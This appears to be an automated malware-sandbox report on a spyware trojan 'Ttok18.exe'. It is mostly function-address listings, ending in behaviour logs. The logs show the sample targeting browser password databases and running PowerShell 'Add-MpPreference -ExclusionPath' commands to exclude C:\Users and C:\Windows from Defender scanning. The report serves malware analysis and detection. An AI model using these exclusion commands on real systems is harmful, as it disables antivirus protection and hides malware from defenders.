            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044070115_2_00440701
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040E71115_2_0040E711
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004327C115_2_004327C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042C78115_2_0042C781
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004127A115_2_004127A1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004107A115_2_004107A1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044081115_2_00440811
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040C82115_2_0040C821
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040A82115_2_0040A821
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040A8C115_2_0040A8C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042C8D115_2_0042C8D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040E95115_2_0040E951
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044095115_2_00440951
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040A96115_2_0040A961
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040C97115_2_0040C971
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042C9D115_2_0042C9D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004109F115_2_004109F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041299115_2_00412991
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00408A4115_2_00408A41
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040AA7115_2_0040AA71
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040EA1115_2_0040EA11
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040CA3115_2_0040CA31
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040CAF115_2_0040CAF1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042CAA115_2_0042CAA1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00410AB115_2_00410AB1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00412AB115_2_00412AB1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042CB4115_2_0042CB41
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00432B5115_2_00432B51
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040AB6115_2_0040AB61
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00408B0115_2_00408B01
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040EB0115_2_0040EB01
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040EBC115_2_0040EBC1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00408BC115_2_00408BC1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040CBF115_2_0040CBF1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00412B8115_2_00412B81
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00410B9115_2_00410B91
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00412C5115_2_00412C51
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040AC6115_2_0040AC61
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00408CE115_2_00408CE1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040CD4115_2_0040CD41
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040AD5115_2_0040AD51
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00414D6115_2_00414D61
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042CD6115_2_0042CD61
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00408D7115_2_00408D71
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00410D1115_2_00410D11
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040ED3115_2_0040ED31
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040EDD115_2_0040EDD1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040EE7115_2_0040EE71
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040AE1115_2_0040AE11
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00408E1115_2_00408E11
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040CE3115_2_0040CE31
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00410EA115_2_00410EA1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00410F4115_2_00410F41
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040EF5115_2_0040EF51
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040AF5115_2_0040AF51
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00408F1115_2_00408F11
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040CF3115_2_0040CF31
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042CFE115_2_0042CFE1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040CFF115_2_0040CFF1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F05115_2_0040F051
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041107115_2_00411071
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040900115_2_00409001
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040B03115_2_0040B031
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040B0D115_2_0040B0D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004090E115_2_004090E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D09115_2_0040D091
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041114115_2_00411141
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042D17115_2_0042D171
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043F11115_2_0043F111
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F12115_2_0040F121
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044313115_2_00443131
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F1D115_2_0040F1D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004431D115_2_004431D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042B1E115_2_0042B1E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040918115_2_00409181
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D25115_2_0040D251
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041123115_2_00411231
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040923115_2_00409231
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F2C115_2_0040F2C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004112D115_2_004112D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040B2E115_2_0040B2E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044329115_2_00443291
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040935115_2_00409351
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044336115_2_00443361
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040B37115_2_0040B371
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D30115_2_0040D301
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043F31115_2_0043F311
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042B32115_2_0042B321
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042D3C115_2_0042D3C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D3D115_2_0040D3D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041338115_2_00413381
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F3B115_2_0040F3B1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044343115_2_00443431
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004434F115_2_004434F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043F48115_2_0043F481
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004094A115_2_004094A1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040B4A115_2_0040B4A1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041356115_2_00413561
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040956115_2_00409561
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D50115_2_0040D501
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041151115_2_00411511
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040B5E115_2_0040B5E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F59115_2_0040F591
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043F59115_2_0043F591
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044359115_2_00443591
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D5B115_2_0040D5B1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043F65115_2_0043F651
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044367115_2_00443671
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041360115_2_00413601
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041162115_2_00411621
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F63115_2_0040F631
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042D6C115_2_0042D6C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D6E115_2_0040D6E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043F6F115_2_0043F6F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040B68115_2_0040B681
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042B69115_2_0042B691
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004096B115_2_004096B1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041174115_2_00411741
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F74115_2_0040F741
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044374115_2_00443741
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041371115_2_00413711
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040B7C115_2_0040B7C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043F7E115_2_0043F7E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004437E115_2_004437E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F7F115_2_0040F7F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004097B115_2_004097B1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D80115_2_0040D801
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F8C115_2_0040F8C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004098D115_2_004098D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043F8D115_2_0043F8D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040B8E115_2_0040B8E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D8F115_2_0040D8F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042D8F115_2_0042D8F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041188115_2_00411881
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004438A115_2_004438A1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041396115_2_00413961
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043F97115_2_0043F971
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004119D115_2_004119D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004139F115_2_004139F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D9F115_2_0040D9F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004099F115_2_004099F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F98115_2_0040F981
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044398115_2_00443981
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00411A7115_2_00411A71
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040BA0115_2_0040BA01
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043FA0115_2_0043FA01
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042DA0115_2_0042DA01
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042DAC115_2_0042DAC1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040BAF115_2_0040BAF1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00409A8115_2_00409A81
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043FAA115_2_0043FAA1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042BAA115_2_0042BAA1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00413B0115_2_00413B01
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040DB0115_2_0040DB01
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00411B3115_2_00411B31
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00411BD115_2_00411BD1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040DBD115_2_0040DBD1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00413BE115_2_00413BE1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040BB8115_2_0040BB81
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00409BA115_2_00409BA1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042BBB115_2_0042BBB1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042BC5115_2_0042BC51
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00411C7115_2_00411C71
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040BC7115_2_0040BC71
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040FC3115_2_0040FC31
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00409CC115_2_00409CC1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040DC8115_2_0040DC81
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043FC9115_2_0043FC91
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00413D1115_2_00413D11
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040BD1115_2_0040BD11
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040DD3115_2_0040DD31
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043FD3115_2_0043FD31
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040DDD115_2_0040DDD1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043FDD115_2_0043FDD1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042BDE115_2_0042BDE1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00409DF115_2_00409DF1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00403D8115_2_00403D81
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00411D9115_2_00411D91
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040BDB115_2_0040BDB1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043FE6115_2_0043FE61
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00411E3115_2_00411E31
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042BED115_2_0042BED1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040BE8115_2_0040BE81
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040DE8115_2_0040DE81
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00447F4F15_2_00447F4F
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040BF7115_2_0040BF71
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040DFD115_2_0040DFD1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00409FA115_2_00409FA1
            Source: Ttok18.exe, 00000000.00000002.1995156479.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ttok18.exe
            Source: Ttok18.exe, 00000000.00000000.1691573662.0000000000992000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQwest.exe, vs Ttok18.exe
            Source: Ttok18.exeBinary or memory string: OriginalFilenameQwest.exe, vs Ttok18.exe
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@41/51@6/7
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043226F CreateToolhelp32Snapshot,Process32First,15_2_0043226F
            Source: C:\Users\user\Desktop\Ttok18.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ttok18.exe.logJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2992:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2848:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4080:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvsmxirt.zf5.ps1Jump to behavior
            Source: Ttok18.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Ttok18.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\Ttok18.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: AASR9H47Q.15.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Ttok18.exeReversingLabs: Detection: 18%
            Source: unknownProcess created: C:\Users\user\Desktop\Ttok18.exe "C:\Users\user\Desktop\Ttok18.exe"
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\AAxBDhzeE
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
